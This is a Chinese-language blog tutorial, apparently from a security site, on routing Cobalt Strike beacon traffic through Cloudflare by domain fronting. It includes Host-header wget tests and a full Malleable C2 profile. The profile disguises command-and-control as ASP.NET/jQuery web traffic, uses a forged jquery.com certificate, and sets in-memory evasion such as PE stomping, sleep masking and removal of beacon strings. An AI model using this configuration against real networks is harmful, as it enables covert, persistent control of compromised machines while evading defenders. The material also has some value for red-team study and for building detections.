前期准备
- 国外VPS,用于放置 teamserver
- 谷歌邮箱账号
- cloudflare.com/ 免费cdn
- cobalt strike
将cdn绑定teamserver的ip,之后,启动teamserver +profile
域前置原理
正常情况下
在cs上上传个HTML文件
用wget下载访问
wget -U demo -q -O - http://target.com/index.html
hello world!!!
访问返回结果
如果出现522代表cdn未生效
利用header头让cdn跳转到指定的服务器
wget -U demo -q -O - http://arya.ns.cloudflare.com/index.html --header "Host: target.com"
访问下载,返回结果
hello world!!!
我们可以通过修改cs的配置文件,强制让cdn跳转到我们指定的域名
cs的配置文件原理
请求过程
-
首先由客户端发起请求经过cdn,之后通过header跳转到我们指定的域名
(需要在http-get中添加header头,还有http-post中添加header头,这样使get和post都按照设置好的规则去走流量)
- server端接收到get数据,并按照设置的header头,去跳转到我们的服务器
- 由server持续通信,需要用到分段传输(重要)。(http-stager这个规则主要是为上线设定的,需要在其中添加header头,重定向到我们的服务)
之后完成的c2的配置文件
cdn.profile
#
# Amazon browsing traffic profile
#
# Author: @harmj0y
#
# Certificate settings for the HTTPS listener. The subject fields imitate
# jquery.com; the article's closing note says only HTTP was actually used, so
# this block may be inert in that setup.
# NOTE(review): with `keystore` set, the subject fields below may be ignored in
# favour of the keystore contents — confirm for the CS version in use.
https-certificate {
set keystore "./cobaltstrike.store"; # keystore holding the listener key pair
set password "123456"; # keystore password as shipped in this example
set L "Mountain View";
set C "US";
set ST "CA";
set CN "jquery.com"; # common name the certificate claims
set O "jQuery";
set OU "Certificate Authority";
set validity "365"; # validity period in days
}
# SpawnTo: choose a program matching the target bitness, one that does not
# carry UAC elevation, ideally a process that normally also talks to the network.
# No suitable x64 program was found here (it would not start), so the default
# rundll32.exe is kept for x64.
#set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
#set spawnto_x64 "%windir%\\System32\\spoolsv.exe -k netsvcs";
# Post-exploitation job settings; only the x86 spawn-to process is overridden,
# matching the note above.
post-ex{
set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
}
# Staging and beacon timing.
set host_stage "true"; # hosts that check in over HTTP, HTTPS or DNS will use stagers
set sleeptime "5000"; # check-in interval, in milliseconds
set jitter "35"; # randomise the interval by up to this percentage
set maxdns "255"; # maximum hostname length for DNS-channel requests
# Fixed browser User-Agent sent on every request.
# NOTE(review): a static UA pinned to one Chrome build becomes a stable
# fingerprint over time; worth knowing on both sides of the wire.
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";
# Beacon check-in over GET. `client` is what the beacon sends, `server` is what
# the teamserver answers with.
http-get {
set uri "/Sample/DownloadFile";
client {
# The Host header names the CDN-fronted domain rather than the edge the TCP
# connection actually goes to; that Host/destination mismatch is the
# domain-fronting step the article describes (and a point defenders can
# key on). NOTE(review): the value is split across a line break in this
# listing — looks like a copy/paste artifact.
header "Host" "cdn.target.com
";
header "Cookie" "ASP.NET_SessionId=zywxteesnq4eryyslpnestmn"; # fixed decoy cookie
# Referer: same line-break artifact as Host.
header "Referer" "https://cdn.target.com
";
# Session metadata is base64url-encoded into the fileName query parameter.
metadata {
base64url;
parameter "fileName";
}
# Fixed decoy query parameters.
parameter "relativeUrl" "/Scripts/jquery.min.js";
parameter "v" "js";
parameter "s" "0.4456841254";
}
server {
# Response headers imitating an ASP.NET site.
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "X-Frame-Options" "SAMEORIGIN";
header "X-UA-Compatible" "IE=edge";
# Tasking is netbios-encoded and wrapped in a fixed HTML "error" page; the
# same wrapper is reused by the http-post and http-stager blocks below.
output {
netbios;
prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a { margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
append "</td></tr><tr><td> </td><td></td></tr><tr><td> </td><td></tr></table></body></html>";
print;
}
}
}
# Beacon output channel. The verb is overridden to GET, so output and the
# session id travel in query parameters rather than a request body.
http-post {
set uri "/Sample/UploadFile";
set verb "GET";
client {
# Host header: same fronted-domain value and same line-break artifact as in
# http-get.
header "Host" "cdn.target.com
";
header "Accept" "*/*";
# NOTE(review): a multipart Content-Type on a body-less GET is an oddity that
# an inspecting proxy could flag.
header "Content-Type" "multipart/form-data";
header "Referer" "https://cdn.target.com
";
# Beacon output is base64url-encoded into the fileName query parameter.
output {
base64url;
parameter "fileName";
}
parameter "relativeUrl" "/upload/";
parameter "s" "0.4456841254";
# Session id is base64url-encoded into the v query parameter.
id {
base64url;
parameter "v";
}
}
server {
# Same ASP.NET-style headers and HTML wrapper as http-get.
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "X-Frame-Options" "SAMEORIGIN";
header "X-UA-Compatible" "IE=edge";
output {
netbios;
prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a { margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
append "</td></tr><tr><td> </td><td></td></tr><tr><td> </td><td></tr></table></body></html>";
print;
}
}
}
# Memory indicators: how the reflective DLL stage is laid out once loaded.
# Option meanings below follow the Malleable C2 documentation; confirm for the
# CS version in use.
stage {
set userwx "false"; # do not request RWX memory for the stage
set stomppe "true"; # overwrite MZ/PE header markers after loading
set obfuscate "true"; # obfuscate the DLL's in-memory headers/imports
set name "srv.dll"; # exported name of the stage DLL
set cleanup "true"; # free the loader memory after the stage is running
# PE header values captured with peclone against a Windows 10 explorer.exe,
# so the in-memory image resembles that binary.
set checksum "0";
#set compile_time "18 Sep 2013 06:49:18";
set entry_point "650688";
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
# CS 3.12 "Obfuscate and Sleep" for HTTP Beacons
set sleep_mask "true";
transform-x86 { # transform the x86 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend NOP (0x90) bytes, not nulls
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
}
transform-x64 { # transform the x64 rDLL stage
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend NOP (0x90) bytes, not nulls
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "beacon.x64.dll" ""; # Remove this text
}
stringw "jQuery"; # Add a wide (UTF-16) string to the binary
}
# Stager download (used on initial check-in when host_stage is true). The
# article stresses that the Host header must be set here too, otherwise the
# CDN will not route the stager request to the teamserver.
http-stager {
client {
# Same fronted-domain Host value and line-break artifact as in http-get.
header "Host" "cdn.target.com
";
header "Accept-Encoding" "gzip, deflate";
header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Referer" "https://cdn.target.com
";
}
server {
# Claims to be IIS 8.5; the same HTML "error" wrapper as http-get/http-post
# surrounds the stage, with no encoding step here.
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "Accept-Encoding";
header "X-Frame-Options" "SAMEORIGIN";
header "X-UA-Compatible" "IE=edge";
header "Server" "Microsoft-IIS/8.5";
header "Connection" "close";
output {
prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a { margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
append "</td></tr><tr><td> </td><td></td></tr><tr><td> </td><td></tr></table></body></html>";
print;
}
}
}
注意只能使用http
参考
cdn上线
https://www.chainnews.com/articles/348984046030.htm
https://evi1cg.me/archives/Domain_Fronting.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。